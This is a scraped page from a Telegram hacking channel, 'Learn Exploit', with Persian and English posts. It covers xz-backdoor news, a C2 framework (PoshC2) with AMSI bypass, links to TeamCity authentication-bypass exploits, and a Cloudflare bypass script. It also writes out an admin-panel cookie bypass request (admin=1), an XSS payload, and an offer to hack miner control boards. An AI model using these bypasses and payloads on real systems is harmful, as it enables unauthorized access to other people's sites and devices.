0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
احتمالا درآمدزایی از تلگرام به زودی برای همه کانال های بالای ۱۰۰۰ هزار عضو فعال شود .
در تصاویر بالا پنل درآمدزایی تلگرام رو مشاهده می‌کنید.

طیق اعلام تلگرام، ۵۰ درصد از پرداختی تبلیغات نمایش داده شده به صاحب کانال ها میرسد.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
#خبر

ظاهرا توی ورژن های 5.6.0 و 5.6.1 پکیج xz یه backdoor پیدا شده و توصیه میشه به ورژن جدید آپگرید کنید ⚠️:
# pacman -Syu

توضیحات تکمیلی:
Source 01 https://archlinux.org/news/the-xz-package-has-been-backdoored/

Source 02
https://www.openwall.com/lists/oss-security/2024/03/29/4



IR0Day.Today Bax
@LearnExploit
PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

💬
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

📊 Other notable features of PoshC2 include:
⚪️ Consistent and Cross-Platform support using Docker.
⚪️ Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
⚪️ A large number of payloads generated out-of-the-box which are frequently updated.
⚪️ Shellcode containing in-build AMSI bypass and ETW patching for a high success rate and stealth.
⚪️ Auto-generated Apache Rewrite rules for use in a C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
⚪️ A modular and extensible format allowing users to create or edit C#, PowerShell or Python3 modules which can be run in-memory by the Implants.
⚪️ Notifications on receiving a successful Implant via Pushover or Slack.
⚪️ A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history and suggestions.
⚪️ Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
⚪️ Client/Server format allowing multiple team members to utilise a single C2 server.
⚪️

😸 Github

⬇️ Download
🔒 LearnExploit

#Payload #C2 #Proxy #Aware

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
find an admin panel bypass using (admin=1).

/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value)  -->  Set-Cookie:admin=;

Bypass request:

GET /admin HTTP/1.1
Cookie:admin=1;

#Trick #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-3094 - An ssh honeypot with the XZ backdoor.

Github

#CVE #Honeypot #Backdoor
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Hack And decrypt of the Miner Series ( ControlBoards ) WhatsMiner M2x & M3x and AntMiner ( All Series ) to configure ( reconfig ) for any Digital Coins.

Pm :
@IrDefacer
0Day.Today | Learn Exploit | Zero World | Dark web |
Photo
فوری؛ اپدیت جدید تلگرام با امکان درامدزایی برای کانال ها منتشر شد

صاحبین کانال میتونن از طریق تبلیغاتی که تلگرام داخل کانالشون نشون میده از 50 درصد سهم برخوردار بشن

اگه کانالی با 1000 ممبر به بالا دارید میتونید در تنظیمات کانالتون در قسمت Statistics وارد تب monetization بشید

این پول از طریق TON به کیف پول صاحبین کانال واریز میشه

این قابلیت برای ایران نیز فعال است .

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
نات کوین احتمالا 20 اوریل یعنی 1 اردیبهشت در صرافی ها لیست بشه

نکته ی جالب اینجاست که 1 اردیبهشت روز هاوینگ بیت کوین هم هست.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
xz-utils backdoor

Github

#backdoor
——————‌
0Day.Today
@LearnExploit
@Tech_Army
A cloudflare verification bypass script for webscraping

Github

#cloudflare #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Forwarded from LearnExploit ️ (R00T)
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 drozer 💻

💬
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Android Runtime, other apps' IPC endpoints and the underlying OS.

Software pre-requisites:
⚪️ Python3.8
⚪️ Protobuf 4.25.2 or greater
⚪️ Pyopenssl 22.0.0 or greater
⚪️ Twisted 18.9.0 or greater
⚪️ Distro 1.8.0 or greater
⚪️ Java Development Kit 11 or greater

🔼 Install:

👩‍💻 Debian:
cd drozer
python setup.py bdist_wheel
pip install dist/drozer-<version>-py3-none-any.whl


👩‍💻 Arch:
cd drozer
virtualenv -p /usr/bin/python3 venv
source venv/bin/activate
python setup.py bdist_wheel
sudo pip install dist/drozer-<version>-py3-none-any.whl


💻 Usage:
adb install drozer-agent.apk


😸 Github

#Android #Security #Pentest

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Learn the basics of burpsuite. Start using Burp with web applications.

⬇️ Download

#Burpsuite #Kalilinux #Cybersecurity

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass

LearnBox:
1_Exploits
2_Video

#CVE #Bug #Authentication #Bypass

📣 T.me/LearnExploit
📣 T.me/BugCod3
ری اکشن خوب بگیره اکسپلویتشو گسترش میدم :00
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army